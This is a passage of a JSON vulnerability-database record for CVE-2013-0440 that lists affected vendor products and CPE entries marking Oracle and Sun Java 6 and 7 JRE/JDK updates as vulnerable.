"trust": 0.3, "vendor": "suse", "version": "11" }, { "model": "java sdk sr15", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0" }, { "model": "tivoli application dependency discovery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.1" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.5" }, { "model": "security appscan standard", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.6" }, { "model": "nonstop server j06.09.02", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "rational performance tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.3" }, { "model": "ucosminexus application server enterprise (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-00" }, { "model": "tivoli netcool/omnibus", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.4" }, { "model": "tivoli application dependency discovery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.12" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.20" }, { "model": "iq", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.1" }, { "model": "nonstop server h06.18.01", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "aura application server sip core", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "53002.1" }, { "model": "tivoli system automation for multiplatforms", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2.1" }, { "model": "ucosminexus developer standard", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.17" }, { "model": "websphere mq", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "infosphere optim performance manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2" }, { "model": "proactive contact", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "4.1.1" }, { "model": "websphere mq", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.19" }, { "model": "nonstop server h06.19.00", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "maximo asset management essentials", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "linux amd64", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "nonstop server j06.06.02", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "security appscan source", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.6" }, { "model": "call management system r16.1", "scope": null, "trust": 0.3, "vendor": "avaya", "version": null }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.3" }, { "model": "rational appscan enterprise", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.6.0.0" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2.3" }, { "model": "content collector", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.25" }, { "model": "aura system platform sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "java se sr5", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "6.0.1" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.13" }, { "model": "java sdk sr13 fp11", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4.2" }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.1.5" }, { "model": "jre 27", "scope": "eq", "trust": 0.3, "vendor": "sun", "version": "1.4.2" }, { "model": "security appscan source", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.6.0.1" }, { "model": "java sdk sr3", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.0.1" }, { "model": "nonstop server j06.12.00", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.5" }, { "model": "websphere extreme scale", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "nonstop server j06.09.01", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "maximo asset management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5" }, { "model": "websphere application server", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "8.5.0.2" }, { "model": "websphere operational decision management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.0.0" }, { "model": "rational host on-demand", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "11.0.7" }, { "model": "enterprise linux desktop", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "rational developer for system z", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.51" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.23" }, { "model": "optim performance manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1.0.1" }, { "model": "ucosminexus developer", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "010" }, { "model": "network and security manager software 2012.2r9", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "websphere datapower xc10 appliance", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "2.13" }, { "model": "linux enterprise server sp3 ltss", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "10" }, { "model": "websphere application server", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.47" }, { "model": "ucosminexus service platform messaging", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "-0" }, { "model": "websphere mq", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5" }, { "model": "voice portal sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.0" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.9" }, { "model": "rational developer for system z", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.0" }, { "model": "nonstop server j06.10.02", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "aura messaging", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.1" }, { "model": "service manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "9.31" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.8" }, { "model": "aura sip enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "ucosminexus service architect", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-00" }, { "model": "nonstop server h06.24.01", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "opensuse", "scope": "eq", "trust": 0.3, "vendor": "s u s e", "version": "11.4" }, { "model": "ucosminexus application server standard-r", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-70" }, { "model": "ucosminexus application server express )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-50" }, { "model": "rational requirements composer", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "4.0.3" }, { "model": "aura communication manager utility services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2.4.0.15" }, { "model": "websphere mq", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.18" }, { "model": "rational automation framework", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.0.2" }, { "model": "filenet business process manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.7" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.1" }, { "model": "rational application developer for websphere", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.0" }, { "model": "java se sr11", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6" }, { "model": "call management system r", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "15" }, { "model": "jre 1.5.0 09", "scope": null, "trust": 0.3, "vendor": "sun", "version": null }, { "model": "linux lts amd64", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "12.04" }, { "model": "java se sr13-fp14", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4.2" }, { "model": "ims enterprise suite", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.6" }, { "model": "hp-ux b.11.11", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "tivoli remote control", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.2" }, { "model": "websphere cast iron cloud integration virtual applianc", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.3" }, { "model": "aura communication manager utility services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2.5.0.15" }, { "model": "nonstop server j06.08.01", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "nonstop server h06.15.01", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "java se sr14", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0" }, { "model": "qradar security information and event manager 7.1mr1", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "ucosminexus application server enterprise )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-50" }, { "model": "ucosminexus developer standard", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "8" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.141" }, { "model": "network and security manager software r2", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "2012.2" }, { "model": "nonstop server h06.23", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.3" }, { "model": "enterprise server", "scope": "eq", "trust": 0.3, "vendor": "mandrakesoft", "version": "5" }, { "model": "call management system r", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "16" }, { "model": "iq", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "4.0" }, { "model": "java se sr13-fp10", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4.2" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.4" }, { "model": "business server", "scope": "eq", "trust": 0.3, "vendor": "mandriva", "version": "1x8664" }, { "model": "tivoli system automation application manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1" }, { "model": "rational synergy", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.0.4" }, { "model": "java se sr13-fp15", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "1.4.2" }, { "model": "nonstop server h06.22.01", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.8" }, { "model": "infosphere optim performance manager", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "5.3" }, { "model": "data studio", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1.1" }, { "model": "java sdk sr13-fp15", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "1.4.2" }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "message networking", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.1" }, { "model": "java se sr13", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0" }, { "model": "nonstop server h06.19.03", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "cosminexus studio", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "5" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.1" }, { "model": "sterling secure proxy", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.4.1" }, { "model": "cosminexus client", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "06-00" }, { "model": "cosminexus studio web edition", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "-04-00" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.33" }, { "model": "websphere mq", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.1.2" }, { "model": "java se sr13-fp11", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4.2" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.1" }, { "model": "tivoli business service manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.1" }, { "model": "nonstop server h06.21.02", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "mac os server", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.6.8" }, { "model": "aura presence services sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "enterprise content management system monitor fix pack", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "5.1.01" }, { "model": "communication server 1000m signaling server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.0" }, { "model": "communication server 1000e", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.0" }, { "model": "rational requirements composer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0" }, { "model": "ucosminexus application server express (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-00" }, { "model": "java sdk sr10", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6" }, { "model": "nonstop server h06.19.01", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "tivoli directory integrator", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0" }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.1.4" }, { "model": "conferencing standard edition sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "proactive contact", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "4.1.2" }, { "model": "linux i386", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "11.10" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.34" }, { "model": "rational application developer for websphere", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.0.0" }, { "model": "nonstop server j06.11.00", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "nonstop server h06.26.01", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "aura presence services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.1" }, { "model": "linux enterprise server sp1 ltss", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "11" }, { "model": "centos", "scope": "eq", "trust": 0.3, "vendor": "centos", "version": "5" }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.1.2" }, { "model": "nonstop server j06.04.00", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.1" }, { "model": "java se sr3", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7" }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.2.4" }, { "model": "rational application developer for websphere", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.27" }, { "model": "jdk 1.5.0 07-b03", "scope": null, "trust": 0.3, "vendor": "sun", "version": null }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0" }, { "model": "voice portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.1.1" }, { "model": "rational developer for system z", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.0" }, { "model": "message networking", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.5" }, { "model": "communication server 1000e signaling server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "cms r16", "scope": null, "trust": 0.3, "vendor": "avaya", "version": null }, { "model": "security appscan source", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "8.71" }, { "model": "nonstop server h06.20.01", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "nonstop server j06.10.00", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "proactive contact", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.1" }, { "model": "ucosminexus service platform windows", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-00(x64)" }, { "model": "nonstop server h06.16.02", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "cosminexus server web edition", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "-04-00" }, { "model": "voice portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "4.1" }, { "model": "java sdk sr13-fp14", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4.2" }, { "model": "websphere mq", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.11" }, { "model": "rational appscan enterprise", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.6.0.2" }, { "model": "filenet business process manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.5.1" }, { "model": "aura sip enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "3.0" }, { "model": "communication server 1000m", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.5" }, { "model": "java se sr15", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0" }, { "model": "aura communication manager utility services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "ims enterprise suite", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2" }, { "model": "communication server 1000m signaling server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.5" }, { "model": "rational team concert", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0" }, { "model": "nonstop server h06.25.01", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "communication server 1000e", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.5" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.4" } ], "sources": [ { "db": "CERT/CC", "id": "VU#858729" }, { "db": "BID", "id": "57712" }, { "db": "NVD", "id": "CVE-2013-0440" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.7.0:update9:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.7.0:update6:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.7.0:update3:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.7.0:update10:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.7.0:update11:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.7.0:update2:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.7.0:update5:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.7.0:update4:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.7.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.7.0:update7:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.7.0:update1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.7.0:update6:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.7.0:update5:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.7.0:update7:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.7.0:update2:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.7.0:update11:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.7.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.7.0:update9:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.7.0:update3:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.7.0:update1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.7.0:update10:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.7.0:update4:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:sun:jre:1.6.0:update_3:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.6.0:update_5:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.6.0:update_13:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.6.0:update_1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.6.0:update_2:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.6.0:update_16:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.6.0:update_20:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.6.0:update_15:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.6.0:update_6:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.6.0:update_19:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.6.0:update35:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.6.0:update27:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.6.0:update26:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.6.0:update_18:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.6.0:update_10:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.6.0:update_9:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.6.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.6.0:update33:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.6.0:update25:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.6.0:update24:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.6.0:update_17:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.6.0:update_7:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.6.0:update32:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.6.0:update22:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.6.0:update_14:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.6.0:update_4:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.6.0:update30:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.6.0:update_21:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.6.0:update_12:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.6.0:update_11:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.6.0:update37:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.6.0:update34:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.6.0:update31:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.6.0:update23:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.6.0:update38:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.6.0:update29:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.6.0:update_4:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.6.0:update_7:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.6.0:update_19:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.6.0:update_13:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.6.0:update_3:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.6.0:update_11:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.6.0:update_10:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.6.0:update_14:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.6.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.6.0:update_17:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.6.0:update32:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.6.0:update31:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.6.0:update22:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.6.0:update_21:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.6.0:update29:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.6.0:update_20:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.6.0:update_12:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { 